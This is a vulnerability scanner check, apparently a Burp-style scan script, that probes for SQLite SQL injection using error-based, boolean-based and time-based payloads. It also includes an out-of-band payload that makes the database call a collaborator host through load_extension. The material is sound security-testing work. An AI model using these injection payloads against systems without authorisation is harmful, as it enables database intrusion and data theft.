# SQLite SQL Injection Detection
# Tests error-based, boolean-based, time-based, and OOB SQLi

given insertion_point: "request"

# Extract baseline response
extract original_body from response.body
extract original_status from response.status
extract original_time from response.time

# 1. Error-Based: Trigger SQLite syntax error
send request:
  replace insertion_point with insertion_point + "'"
if regex `SQLITE_ERROR.*syntax error|near.*syntax error` in response.body then
  report issue:
    severity: high
    confidence: certain
    name: "SQLite SQL Injection (Error-Based)"
    detail: "SQLite error detected with payload: {insertion_point + '''}. Response: {regex `SQLITE_ERROR.*syntax error|near.*syntax error`}"
    remediation: "Use parameterized queries or prepared statements."
end if

# 2. Boolean-Based Blind: Check response content change
send request:
  replace insertion_point with insertion_point + "' AND 1=1--"
extract true_response from response.body

send request:
  replace insertion_point with insertion_point + "' AND 1=2--"
extract false_response from response.body

if true_response != false_response and true_response == original_body then
  report issue:
    severity: high
    confidence: firm
    name: "SQLite SQL Injection (Boolean-Based Blind)"
    detail: "Response changed between true (1=1) and false (1=2) conditions. True payload: {insertion_point + ''' AND 1=1--'}"
    remediation: "Sanitize inputs and use parameterized queries."
end if

# 3. Time-Based Blind: Use recursive CTE for delay
send request:
  replace insertion_point with insertion_point + "' AND (WITH RECURSIVE cnt(x) AS (SELECT 1 UNION ALL SELECT x+1 FROM cnt LIMIT 1000000) SELECT 1)--"
  set timeout to 10 seconds
if response.time > original_time + 5000 then
  report issue:
    severity: high
    confidence: tentative
    name: "SQLite SQL Injection (Time-Based Blind)"
    detail: "Response delayed by {response.time - original_time}ms with payload: {insertion_point + ''' AND (WITH RECURSIVE cnt(x) AS (SELECT 1 UNION ALL SELECT x+1 FROM cnt LIMIT 1000000) SELECT 1)--'}"
    remediation: "Use prepared statements to prevent injection."
end if

# 4. Out-of-Band: HTTP via app-specific logging
send request:
  replace insertion_point with insertion_point + "'; SELECT load_extension('http://test.' || collaborator_address || '/sqlite');--"
if http interactions then
  report issue:
    severity: high
    confidence: certain
    name: "SQLite SQL Injection (Out-of-Band)"
    detail: "HTTP interaction detected via Collaborator with payload: {insertion_point + '''; SELECT load_extension('http://test.' || collaborator_address || '/sqlite');--'}"
    remediation: "Disable load_extension and implement strict input validation."
end if
